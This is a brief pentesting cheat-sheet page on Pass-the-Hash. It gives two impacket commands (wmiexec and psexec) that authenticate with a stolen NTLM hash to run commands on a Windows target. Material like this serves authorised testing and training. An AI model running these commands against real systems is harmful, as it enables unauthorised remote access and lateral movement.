# Pass-the-Hash

{% hint style="info" %}
Pass-the-hash requires SMB and Printer Sharing feature to be enabled (common)
{% endhint %}

Already detailed in 3 - Authentication Attack

```
impacket-wmiexec -hashes :<HASH> <USER>@<TARGET-IP>
# other version
impacket-psexec -hashes 00000000000000000000000000000000:<HASH> <USER>@<TARGET-IP>
```
